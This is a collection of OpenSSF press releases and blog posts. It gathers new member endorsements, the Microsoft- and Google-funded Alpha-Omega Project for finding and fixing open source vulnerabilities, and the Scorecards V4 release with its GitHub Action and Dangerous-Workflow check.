“Open Source software has become a key software supply chain of IT, and Open Source software security has a huge impact on infrastructure security. Alibaba Cloud, as the world’s leading cloud vendor that always puts security and data privacy as the priority, is keeping investing in security research. For a long time, the public has felt that open source software is very safe because of transparency, all software developers can review the code, find and fix vulnerabilities. But In fact, there are many widely used open-source software that is still possible to have security bugs that have not been noticed for a long time. It is great to have an organization like OpenSSF, which can connect so many great companies and open source communities to advance open source security for all.  As a member of Open Source Security Foundation, we’re looking forward to collaborating with OpenSSF to strengthen the Open Source security,” said Xin Ouyang, Head of Alibaba Cloud Security, Alibaba Cloud.

Block, Inc.

“Block is very excited to join with other industry leaders to help step up the quality of open source security.  I strongly believe that as an industry, it is our priority to address security concerns in a supply chain that we all use.  We may compete on products, but we should never compete on security, and OSSF is a fantastic example of this idea,” said Jim Higgins, CISO of Block.

Blockchain Technology Partners

“Open source software is mainstream and underpins much of the world’s critical infrastructure as well as powering enterprises across the globe. Against this backdrop, OpenSSF’s mission to secure the open source supply chain is fundamental to our future,” said Duncan Johnston-Watt, CEO and Co-founder of Blockchain Technology Partners. “Collaboration is key to OpenSSF’s success, and so we are delighted to contribute to this initiative which complements our existing involvement in the Hyperledger Foundation, CNCF, and LF Energy.”

Catena Cyber

“Open source leads to a massive sharing of knowledge. Beyond the quantity of information, the quality of it becomes important to bring value to society,” said Philippe Antoine, CEO of Catenacyber. “We are glad to join OpenSSF to contribute to improving the cybersecurity of open source projects through fuzzing and other means. Let’s fix all the bugs!”

Chainguard

“Making the software lifecycle secure by default is increasingly critical as open source has become the digital backbone of the world. A vibrant, open software security ecosystem is essential to that mission. We are excited to be members of the Open Source Security Foundation and to continue working with the community to make the software lifecycle secure by default,” said Tracy Miranda, head of open source at Chainguard.

Cloudsmith

“Having a single source of truth for software artifacts has never been more vital to supply chains, especially for the open-source community. OSS engineers need trust and provenance, and a trusted source for secure end-to-end software delivery, from build through to production. At Cloudsmith, our mission is to evolve the cloud-native supply chain, making it simple for the OSS community to secure their software delivery at scale through Continuous Packaging. We are thrilled to join OpenSSF, and we look forward to being part of the continued mission to improve the security posture of open source software universally,” said Alan Carson, CEO at Cloudsmith.

DeployHub

“At DeployHub, we have been laser-focused on tracking the consumption of microservices, including their versions. These relationships make up our new application-level Software Bill of Materials (SBOMS). There is no better place to have this supply chain conversation than the OpenSSF,” explains Tracy Ragan, CEO DeployHub.

MongoDB

“As all industries increasingly rely upon open source software to deliver digital experiences, it is our collective responsibility to help maintain a vibrant and secure ecosystem,” said Lena Smart, Chief Information Security Officer, MongoDB. “You can have all the tools in the world, but at the end of the day, it is people across multiple organizations around the world working together that will ensure an expansive cybersecurity program. One of MongoDB’s values is “Build Together,” and we’re excited to join and further cross-industry collaboration to move the security of open source software forward.”

NCC Group

“Even if your code is perfectly secure, chances are it has vulnerable dependencies. And the number of unpatched vulnerabilities “in the wild” outpaces the speed at which the security community can patch or even identify them. Security, as it is practiced now, doesn’t scale at the rate needed to keep things at least as secure as they were yesterday, and we have compelling reasons to expect this to get even worse for defenders. However, through harnessing dedicated investment and coordinating industry-wide efforts to improve the security of the most critical open source components and find scalable interventions for the entire ecosystem, we have an opportunity to improve software security at a massive scale. But we can only do this together, and it is for this reason that NCC Group is excited to contribute to the work of OpenSSF,” said Jennifer Fernick, SVP & Global Head of Research at cybersecurity consulting firm NCC Group.

ReversingLabs

“The software supply chain has become a major risk vector for new threats, including those from the open source ecosystem. The inherent dependencies and complexities of the modern software supply chain means that companies often lack visibility and the ability to track each component through the entire software development process. Recognizing these challenges, ReversingLabs is pleased to join the OpenSSF and offer its contributions to the community that help drive the automation of more comprehensive software bills of material and mitigate software supply chain and package release risks,” said Mario Vuksan, CEO and Co-founder, ReversingLabs.

Spotify 

“As a technical community we all have a responsibility to improve the security and trust of an open source ecosystem that so many of us rely upon. Spotify has always relied on open source software, and contributes to the community through projects like Backstage. We believe open source software forms the backbone of our industry and we look forward to supporting the foundation’s goal of ensuring everyone can depend on a healthy and secure software ecosystem,” said Tyson Singer, VP, Head of Technology and Platforms at Spotify.

Teleport

“The complexity of modern infrastructure has broadened attack surface areas to the point where data breaches are just about an everyday occurrence,” said Ev Kontsevoy, CEO of Teleport. “These risks have been exacerbated by the rise of remote and hybrid workplaces. With an eye on global attacks, the open source community’s commitment to improving open source security is critical to ushering in a new era of computing. Offering a solution to increase security, ease usability, and help scale enterprise development access, Teleport is pleased to be a part of the OpenSSF.” 

Wingtecher Technology

“As a fast-growing startup, Wingtecher focuses on exploring the technologies that secure various kinds of open source softwares. We are excited to join OpenSSF and ready to collaborate with the community to overcome the emerging open source security challenges worldwide,” said Vincent Li, COO Wingtecher Technology.

About OpenSSF

Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all. For more information, please visit: https://openssf.org/

About the Linux Foundation

Founded in 2000, the Linux Foundation and its projects are supported by more than 1,800 members and is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, Node.js, Hyperledger, RISC-V, and more.  The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users, and solution providers to create sustainable models for open collaboration. For more information, please visit us at linuxfoundation.org.

###

The Linux Foundation has registered trademarks and uses trademarks. For a list of trademarks of The Linux Foundation, please see its trademark usage page: www.linuxfoundation.org/trademark-usage. Linux is a registered trademark of Linus Torvalds.

Media Contacts

Jennifer Cloer

503-867-2304

jennifer@storychangesculture.com

OpenSSF Webinar: Introduction to Project Alpha-Omega

By Alpha-Omega, Blog

We’ve scheduled a webinar on February 16, 2022 at 10:00 AM US/Pacific time for anyone who wants to learn more about Project Alpha-Omega and registration is now open!

Hear from Brian Behlendorf (OpenSSF GM), David A. Wheeler (OpenSSF Director of Security), and Alpha-Omega project leaders Michael Scovetta (Microsoft) and Michael Winser (Google) to learn more about near term goals, milestones, and opportunities for participation in the Alpha-Omega Project.

OpenSSF Announces The Alpha-Omega Project to Improve Software Supply Chain Security for 10,000 OSS Projects

By Press Release

Following a meeting with government and industry leaders at the White House, OpenSSF is excited to announce the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. Microsoft and Google are supporting the Alpha-Omega Project with an initial investment of $5 million. This builds on previous industry-wide investments into OpenSSF aiming to improve open source software security.

Widely deployed OSS projects that are critical to global infrastructure and innovation have become top targets for adversarial attacks. Following new vulnerability disclosures, adversary attacks can be seen within hours. For example, recently discovered vulnerabilities in the widely deployed Log4j library forced many organizations into crisis as they raced to update applications using the popular library before adversaries could attack. 

The Alpha-Omega Project will improve global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities, and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.

“Open source software is a vital component of critical infrastructure for modern society. Therefore we must take every measure necessary to keep it and our software supply chains secure,” said Brian Behlendorf, General Manager, OpenSSF. “Alpha-Omega supports this effort in an open and transparent way by directly improving the security of open source projects through proactively finding, fixing, and preventing vulnerabilities.  This is the start of what we at OpenSSF hope will be a major channel for improving OSS security.”

Alpha: Focusing on the Most Critical OSS Projects

Alpha will be collaborative in nature, targeting and evaluating the most critical open source projects to help them improve their security postures. These projects will include standalone projects and core ecosystem services. They will be selected based on the work by the OpenSSF Securing Critical Projects working group using a combination of expert opinions and data, including the OpenSSF Criticality Score and Harvard’s “Census” analysis identifying critical open source software.

For these selected projects, Alpha team members will provide tailored help to understand and address security gaps. Help can include threat modeling, automated security testing, source code audits, and support remediating vulnerabilities that are discovered. It can also include implementing best practices drawn from criteria outlined by the OpenSSF Scorecard and Best Practices Badge projects.

Alpha will track a series of important metrics providing stakeholders with a better understanding of the security of the open source project they depend on. The public will receive a transparent, standardized view of the project’s security posture and compliance with security best practices. 

Omega: Focused on the Long Tail of OSS Projects

Omega will use automated methods and tools to identify critical security vulnerabilities across at least 10,000 widely-deployed open source projects. This will be accomplished using a combination of technology (cloud-scale analysis), people (security analysts triaging findings) and process (confidentially reporting critical vulnerabilities to the right OSS project stakeholders). Omega will have a dedicated team of software engineers continually tuning the analysis pipeline to reduce false positive rates and identify new vulnerabilities.

Omega community members will provide suggestions on how to automate detection of security vulnerabilities in the future and more generally on efficient ways to implement security best practices.

Corporate Partnerships Are Key

The value of securing the OSS ecosystem has become increasingly clear to companies and organizations of all sizes. Microsoft and Google’s support of the Alpha-Omega Project with an initial investment of $5 million and committed personnel is jump-starting the initiative. Other organizations are strongly encouraged to participate as well, whether by committing volunteers or by direct funding to expand the number of OSS projects that Alpha-Omega can reach.

“The long tail of important open source software, the ‘Omega’ of this endeavor, is always the hardest part—it will require not only considerable funding and perseverance, but its scale will also drive extensive automation for tracking and ideally fixing vulnerabilities,” stated Eric Brewer, VP of Infrastructure and Fellow at Google. “Enabling automation will be one of the greatest improvements for open source security.”

“At Microsoft, we proudly support OpenSSF and the Alpha-Omega Project. Open source software is a key part of our technology strategy, and it’s essential that we understand the security risk that accompanies all of our software dependencies,” offered Mark Russinovich, Chief Technology Officer, Microsoft Azure. “Alpha-Omega will provide assurance and transparency for key open source projects through direct engagement with maintainers and by using state-of-the-art security tools to detect and fix critical vulnerabilities. We look forward to collaborating with industry partners and the open source community on this important initiative.” 

Learn More and Get Involved

For more information about Alpha-Omega, see https://openssf.org/community/alpha-omega/. Individuals interested in updates about Alpha-Omega can sign up through an announcements mailing list. Organizations considering sponsorship or engagement in Alpha-Omega should email memberships@openssf.org

The OpenSSF also encourages all individuals and organizations interested in Alpha-Omega to participate in its Securing Critical Projects working group

Additional Resources

  • Join the OpenSSF to take an active role in improving OSS security
  • Participate in one of six OpenSSF working groups to help improve open source security
  • Get involved in our OpenSSF events, planning committees, and Slack workspaces
  • Download our new State of Software Bill of Materials and Cybersecurity Readiness report
  • Get certified as a secure software development professional

About the Open Source Security Foundation (OpenSSF)

Hosted by the Linux Foundation, the OpenSSF (launched in August 2020) is a cross-industry organization that brings together the industry’s most important open source security initiatives and the individuals and companies that support them. It combines the Linux Foundation’s Core Infrastructure Initiative (CII), founded in response to the 2014 Heartbleed bug, and the Open Source Security Coalition, founded by the GitHub Security Lab to build a community to support open source security for decades to come. The OpenSSF is committed to collaboration and working both upstream and with existing communities to advance open source security for all.

About the Linux Foundation

Founded in 2000, the Linux Foundation is supported by more than 1,800 members and is the world’s leading home for collaboration on open source software, open standards, open data, and open hardware. Linux Foundation’s projects are critical to the world’s infrastructure, including Linux, Kubernetes, Node.js, Hyperledger, RISC-V, and more. The Linux Foundation’s methodology focuses on leveraging best practices and addressing the needs of contributors, users and solution providers to create sustainable models for open collaboration. For more information, please visit us at https://www.linuxfoundation.org/

###

The Linux Foundation has registered trademarks and uses trademarks. For a list of trademarks of The Linux Foundation, please see its trademark usage page. Linux is a registered trademark of Linus Torvalds.

Reducing Security Risks in Open Source Software at Scale: Scorecards Launches V4

By Blog

Authors: Best Practices Working Group, Laurent Simon (Google), Azeem Shaikh (Google), and Jose Palafox (GitHub)

Today, two members of the Open Source Security Foundation, Google and GitHub, are partnering to release Scorecards V4, featuring a new GitHub Action, an added security check, and scaled up scans of the open source ecosystem.

The Scorecards project was launched last year as an automated security tool to help open source users understand the risks of the dependencies they consume. Though the world runs on open source software, many open source projects engage in at least one risky behavior—for example, not enabling branch protection, not pinning dependencies, or not enabling automatic dependency updates. Scorecards makes it simple to evaluate a package before consuming it: a scan run with a single line of code returns individual scores from 0 to 10 rating each individual security practice (“checks”) for the project and an aggregate score for the project’s overall security. Today’s release of a Scorecards GitHub Action makes it easier than ever for developers to stay on top of their security posture.

Helping Developers

Scorecards GitHub Workflow Action

Previously, Scorecards needed to be run manually to judge how changes to a project affected its security. The new Scorecards GitHub Action automates this process: once installed, the Action runs a Scorecards scan after any repository change. Maintainers can view security alerts in GitHub’s scanning dashboard and remediate any risky supply-chain practices introduced by the change. 

As shown in the example above, each alert includes the severity of the risk (low, medium, high, or critical), the file and line where the problem occurs (if applicable), and the remediation steps to fix the issue.

Several critical open source projects have already adopted the Scorecards Action, including Envoy, distroless, cosign, rekor, kaniko. The Action is free to use and can be installed on any public repository by following these directions.

New Checks

We’re continually adding new security checks to help developers assess risks to their projects. This release adds the License check, which detects the presence of a project license, and the Dangerous-Workflow check, which detects dangerous usage of the pull_request_target trigger and risks of script injections in GitHub workflows. Dangerous Workflow is the first Scorecards check with a “Critical” risk level rating, since these patterns are so easily exploited—with these workflows, a single pull request can introduce compromised code into a project. The new Scorecards check informs users of the existence of these vulnerabilities in their project and provides remediation guidance to fix the issue.

Scaling Up Data Availability

The Scorecards team runs weekly scans of a set of critical open source projects, creating snapshots of the security of the overall open source ecosystem at any given time. Over the past few months, we have increased the scale of scans from 50,000 projects to one million projects identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies. With Scorecards V4, the weekly scans now reflect the 0-10 rating scale for each repository rather than the pass-fail results of previous versions, adding more granularity to the data. The scan results are publicly available through the Scorecards API and on the OpenSSF metrics dashboard and Open Source Insights partner websites.

Growing the Community

Since our initial launch, we have been improving our codebase thanks to the expanding Scorecards community. In 2021, we grew to over 40 unique contributors, averaged over 16 commits per week (totalling 860 commits), and closed 270 issues. We warmly welcome new contributors; check out this list of good first-timer issues if you’d like to join in the fun. 

Here’s a few examples of projects that have adopted Scorecards:

“kaniko is a popular open source container image builder for Kubernetes, so it’s very important to maintain the security of the repository and the codebase. The ossf/scorecard Github Action takes care of this for us and continuously monitors the repository. It took less than 5 minutes to install and quickly analyzed the repo and identified easy ways to make the project more secure.” 

– Priya Wadhwa, Kaniko

“We rely on scorecards in distroless to ensure we follow secure development best practices. Secure source and config means safer base images for all our users.”

 – Appu Goundan, Distroless

“Scorecards provides us the ability to rapidly litmus test new dependencies in the Envoy project. We have found this a valuable step in vetting new dependencies for well known attributes and we have integrated Scorecards into our dependency acceptance criteria. Machine checkable properties are an essential part of a sound security process.”

 – Harvey Tuch, Envoy

Strengthening the Supply Chain 

We expect 2022 to be a year of growing awareness of the criticality of supply chain security. If your New Year’s resolution is to pay closer attention to your projects’ security, using the Scorecards GitHub Action is one of the easiest ways to get started. Just install the workflow on your repositories and follow the remediations instructions to address the issues that roll in. Each incremental improvement helps strengthen the open source ecosystem for everyone.

For additional information, head over to the release notes and, as always, please reach out with any questions or suggestions.